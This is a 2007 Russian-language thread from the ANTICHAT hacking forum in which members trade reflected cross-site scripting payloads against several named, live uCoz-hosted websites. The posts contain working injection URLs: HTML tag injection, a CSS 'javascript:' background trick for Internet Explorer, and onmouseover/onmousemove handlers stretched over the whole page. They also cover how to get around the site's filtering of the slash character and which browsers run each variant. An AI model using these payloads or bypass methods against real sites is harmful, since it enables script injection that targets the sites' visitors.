HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу XSS в ucoz?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

XSS в ucoz?
  #1  
Старый 24.10.2007, 20:21
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


Question XSS в ucoz?
re2all

Ну... В общем такая штука есть везде как я посомтрел и понял
Вот случайно выбрал пару сайтов
_http://cs.ucoz.ru/forum/5"><h1>Hello
_http://levitski.clan.su/index/34-13"><h1>Hello
_http://muonline.ucoz.ru/forum/2-2-1"><h1>Hello
_http://ucoz.ucoz.ru/news/2006-11-08-17"><h1>Hello
Вот, работает, но если прописать <script> ... </script> ему не понравится символ /
Возможно-ли это обойти?
Offtop: Прошу не бить если не туда выложил, более подходяшего места не нащёл
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Ponchik; 24.10.2007 в 20:28..
 
Ответить с цитированием

  #2  
Старый 24.10.2007, 22:30
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
С нами: 10520402

Репутация: 6
По умолчанию
Код:
_http://cs.ucoz.ru/forum/5%22style="background:url(javascript:alert('ok'))
работает только в IE
 
Ответить с цитированием

  #3  
Старый 24.10.2007, 22:31
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
С нами: 10520402

Репутация: 6
По умолчанию
http://old.antichat.ru/crackchat/HTML/
тебе в помощь
 
Ответить с цитированием

  #4  
Старый 24.10.2007, 23:02
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
С нами: 9879714

Репутация: 291
По умолчанию
Цитата:
http://cs.ucoz.ru/forum/5%22style=%22visibility:none;width:100%25;height:1 00%25;%22onmouseover=%22alert(0)
проверял в опере..думаю работает везде

%25 надо заменить на что-нибдуь другое

Цитата:
http://cs.ucoz.ru/forum/5%22style=%22display:block;position:absolute;visib ility:none;width:300;height:300;%22onmouseover=%22 alert(0)
Последний раз редактировалось inv; 24.10.2007 в 23:06..
 
Ответить с цитированием

  #5  
Старый 25.10.2007, 00:35
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
С нами: 10520402

Репутация: 6
По умолчанию
onmouseover мне не нравится =\
 
Ответить с цитированием

  #6  
Старый 25.10.2007, 00:37
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
С нами: 9879714

Репутация: 291
По умолчанию
чем
 
Ответить с цитированием

  #7  
Старый 25.10.2007, 01:18
Cawabunga
Постоянный
Регистрация: 16.04.2007
Сообщений: 458
С нами: 10037186

Репутация: 364
По умолчанию
Цитата:
чем
Не напрягайся он тупо посты набивает! (:
Последний раз редактировалось calintz; 25.10.2007 в 01:20.. Причина: Ошибка млять!
 
Ответить с цитированием

  #8  
Старый 25.10.2007, 01:49
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
С нами: 10520402

Репутация: 6
По умолчанию
calintz
ты еще скажи что я дату регистрации подкрутил.
хочется показаться умным... постарайся себя пересилить

inv
первый способ только при наведении на ссылку. собственно этим и не нравится, блок не обрабатывается
второй способ - опера игнорит
 
Ответить с цитированием

  #9  
Старый 25.10.2007, 02:00
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
С нами: 9879714

Репутация: 291
По умолчанию
visibility:none;width:300;height:300; тебе это не о чем не говорит?ссылку можно растянуть на весь броузер

единственное токо я перепутал onmouseover c onmousemove

Поэтому я честно говоря не вижу что тут может не нравится?=)
п с я все тестил в опере (смотреть надо только второй вариант)
насчет не обрабаывается - незабываем удалять пробелы получаемые после вставки кода на форуме
Последний раз редактировалось inv; 25.10.2007 в 02:13..
 
Ответить с цитированием

  #10  
Старый 25.10.2007, 16:05
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
С нами: 10520402

Репутация: 6
По умолчанию
во, точно. а я смотрю чтото не то...

зы. не поверишь, говорит
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.